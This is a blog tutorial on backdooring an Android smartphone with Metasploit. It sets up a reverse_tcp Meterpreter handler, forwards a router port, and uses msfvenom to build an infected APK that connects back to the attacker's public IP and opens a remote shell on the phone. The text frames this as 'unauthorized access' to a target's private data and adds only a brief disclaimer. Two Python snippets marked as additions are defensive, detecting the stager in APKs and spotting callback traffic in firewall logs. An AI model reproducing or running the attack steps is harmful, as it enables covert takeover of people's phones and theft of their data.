by hash3liZer, 12 April 2018
Welcome to the Metasploit Exploitation tutorial. In this tutorial we gain backdoor access to an Android target with Metasploit over a public IP, working with the Metasploit exploit handler and an executable Meterpreter Android payload for remote access.
Metasploit is an exploitation framework used by researchers to break into vulnerable systems with a designed set of exploits. It provides a reasonably up-to-date database of exploits, together with payloads and other modules used to perform malicious tasks on the target machine, such as sniffing keystrokes, executing arbitrary shell commands and silently taking snapshots.
Beyond everything else Metasploit offers, its basic purpose is to test an application through the loopholes that have been discovered in it.
Android is a heavily targeted operating system. For that reason these systems are well maintained and regularly updated, and their firewalls are well acquainted with how exploits execute, so there is a chance that the target's firewall recognizes the nature of the exploit while the payload is still running.
You need a solid understanding of the command-line environment and command syntax, knowledge of basic commands such as ip route, and Metasploit installed. This tutorial uses Kali Linux as the attacker OS and Android KitKat as the target OS.
Open a console (terminal). Check for the weekly updates and update Metasploit if necessary or if new modules are available; doing so keeps you informed of newly added modules and exploits.
After that, start the postgresql database service. Metasploit uses PostgreSQL as its storage backend, which lets us quickly navigate and search Metasploit modules and avoids the slow-search issue that wastes time while the output is being assembled.
systemctl enable postgresql
systemctl start postgresql
Enabling postgresql starts it every time the system boots, so this step does not need to be repeated the next time Metasploit is launched.
Type msfconsole in the terminal and press [Enter]. It takes a few seconds to bring the interface up to a fully functional state.
Search for an appropriate exploit for the target OS using the search command. Our target is an Android smartphone, so the query for Android could be:
search type:exploit platform:android
It lists the exploits available for the Android platform. You can get help on Metasploit commands by typing help followed by a space and the command name, such as help search, which prints the manual for the search command. Here's the output for the Android exploit search:
From the list of exploits shown in the image, we will use the highlighted generic exploit. Now, to use the exploit, enter this command:
There is a set of payloads available for every exploit. These payloads are the modules that provide the environment for transferring and executing commands on the target machine. Different payloads are chosen according to the scenario and by estimating how much working space is available on the target. To show the payloads available for an exploit, type in:
From the available payloads we will use android/meterpreter/reverse_tcp. It is a versatile payload to get started with, and it gives us a Meterpreter session if the payload executes unnoticed. The Meterpreter payload provides a handful of commands that are enough to fully compromise the target system.
set PAYLOAD android/meterpreter/reverse_tcp
Obtain information about the exploit with the info command. This is the key step for understanding how the exploit actually works: it gives you background such as the possible targets and what the core of the vulnerability is.
At this point we know how the exploit works. Now we have to set the options for our exploit: LHOST, the local address of the attacker, and LPORT, the local port to use. To find the local IP address, type:
So, my local IP is 192.168.1.10. Set LHOST and LPORT:
set LHOST 192.168.1.10
set LPORT 777 # Port for establishing connections
Make sure that both parameters are set correctly.
Run the exploit as a job. It executes in the background and notifies you whenever the payload runs on the target system. Afterward, we use the sessions command to open the (target) session.
Find the gateway IP of your network. Type:
Now, open a web browser, navigate to that IP and log in to the router's administrative page.
After a successful login, forward port 777 so that the firewall allows the client and attacker machines to send and receive traffic. If you don't know how to forward a port on your router, go to portforward.com, search for your router's vendor and model, and follow the instructions for your router.
To generate the infected (payload) application with the .apk extension, we use msfvenom, the native payload generator of the Metasploit framework. Open a new console (terminal) and generate a simple payload application for Android:
msfvenom -p android/meterpreter/reverse_tcp --platform android -o /root/Desktop/application.apk LHOST=<public IP address of the attacker> LPORT=777
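As an added defender-side example (not part of the original tutorial), the following Python script triages an APK for the default package name of the Metasploit Android stager, com.metasploit.stage, and for the permission combination such a payload needs for the capabilities listed above; the permission watch-list and the in-memory sample APK are constructed here, not taken from the page.

```python
import io
import zipfile

# Class-descriptor prefix of the default Metasploit Android stager package
# (com.metasploit.stage) as it appears inside classes.dex. A renamed package
# defeats this string match, so a miss is inconclusive while a hit is high-confidence.
STAGER_MARKERS = (b"Lcom/metasploit/stage/", b"com.metasploit.stage")

# Constructed watch-list: permissions a remote-access payload needs for the
# capabilities the tutorial lists (snapshots, audio, SMS, location).
SUSPICIOUS_PERMS = {
    "android.permission.CAMERA",
    "android.permission.RECORD_AUDIO",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
    "android.permission.READ_CALL_LOG",
    "android.permission.ACCESS_FINE_LOCATION",
}


def triage_apk(apk_bytes, declared_permissions):
    """Return findings for an APK given as bytes plus its declared permissions.
    Permissions are passed as strings extracted beforehand (e.g. with aapt),
    because decoding the binary AndroidManifest.xml is out of scope here."""
    findings = {"stager_marker": False, "suspicious_perms": [], "score": 0}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            # Multi-dex apps ship classes.dex, classes2.dex, ...; scan them all.
            if name.startswith("classes") and name.endswith(".dex"):
                if any(marker in zf.read(name) for marker in STAGER_MARKERS):
                    findings["stager_marker"] = True
    findings["suspicious_perms"] = sorted(SUSPICIOUS_PERMS & set(declared_permissions))
    findings["score"] = (10 if findings["stager_marker"] else 0) + len(findings["suspicious_perms"])
    return findings


def build_sample_apk(dex_bytes):
    """Construct a minimal zip with an APK-like layout (sample data, not a real app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<binary-xml placeholder>")
        zf.writestr("classes.dex", dex_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_apk(b"dex\n035\x00 ... Lcom/metasploit/stage/Payload; ...")
    print(triage_apk(sample, ["android.permission.CAMERA", "android.permission.READ_SMS"]))
```

Run it against real APKs by reading the file bytes and feeding the permission list produced by aapt; a high score is a reason to sandbox the app, not proof on its own.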
Now, as soon as the generated apk runs on an Android operating system (target), the Metasploit terminal we left open gives us a live target session. List the available sessions:
To interact with a session, type the session identifier (ID) after the sessions command. It takes you to the Meterpreter shell.
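An added detection example, not from the original tutorial: this Python snippet runs over constructed firewall log lines and flags an internal host repeatedly connecting out to an external address on an unexpected port, which is what a reverse_tcp callback to LHOST:LPORT looks like from the victim network's side. The internal subnet 192.168.1.0/24 and port 777 come from the page; the log format and the expected-port list are assumptions.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime

# Constructed firewall log (not from the tutorial): timestamp, source, destination, dport.
# 192.168.1.23 retries an outbound connection to port 777 every few seconds, which is
# how a reverse-connect stager looks while its handler is not yet reachable.
SAMPLE_LOG = """\
2018-04-12T10:00:01 192.168.1.23 203.0.113.45 777
2018-04-12T10:00:06 192.168.1.23 203.0.113.45 777
2018-04-12T10:00:11 192.168.1.23 203.0.113.45 777
2018-04-12T10:00:16 192.168.1.23 203.0.113.45 777
2018-04-12T10:00:20 192.168.1.23 198.51.100.7 443
2018-04-12T10:01:00 192.168.1.50 198.51.100.9 8080
"""

INTERNAL_NET = ipaddress.ip_network("192.168.1.0/24")  # the LAN used in the tutorial
EXPECTED_PORTS = {53, 80, 443, 993, 5228}  # assumption: tune to your environment (5228 = Google push)


def parse(log_text):
    for line in log_text.splitlines():
        ts, src, dst, dport = line.split()
        yield datetime.fromisoformat(ts), ipaddress.ip_address(src), ipaddress.ip_address(dst), int(dport)


def find_callbacks(log_text, min_hits=3, window_s=60):
    """Group outbound connections to external hosts on unexpected ports and rate them.
    Repeated attempts inside the window are rated high (beacon-like retries); a single
    attempt is still reported as low, because a successful callback connects only once."""
    buckets = defaultdict(list)
    for ts, src, dst, dport in parse(log_text):
        if src in INTERNAL_NET and dst not in INTERNAL_NET and dport not in EXPECTED_PORTS:
            buckets[(str(src), str(dst), dport)].append(ts)
    alerts = []
    for (src, dst, dport), times in sorted(buckets.items()):
        times.sort()
        span = (times[-1] - times[0]).total_seconds()
        repeated = len(times) >= min_hits and span <= window_s
        alerts.append({"src": src, "dst": dst, "dport": dport,
                       "attempts": len(times), "severity": "high" if repeated else "low"})
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_LOG):
        print(alert)
```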
sessions [n] # [n] is the ID of available sessions
The Meterpreter terminal is launched. Type the help command; it lists a handful of commands ranging from getting system info to starting a live chat.
meterpreter > help
Ignore the meterpreter > prefix. It's just there to indicate that it's a Meterpreter session.
Let's try the shell command. It gives us the terminal, or cmd on Windows, of the target system. Try executing a command.
meterpreter > shell
We have seen how to gain unauthorized access to an Android smartphone with Metasploit and how to disclose the target's private data with the given set of Meterpreter commands. Before you proceed against a live target, make sure you are well aware of all the possible consequences of such a theft; they can be disastrous. As already mentioned, Metasploit is just a vulnerability-assessment project. Its main purpose is to familiarize you with how powerful a loophole can be and which sectors of a system it can leave compromised.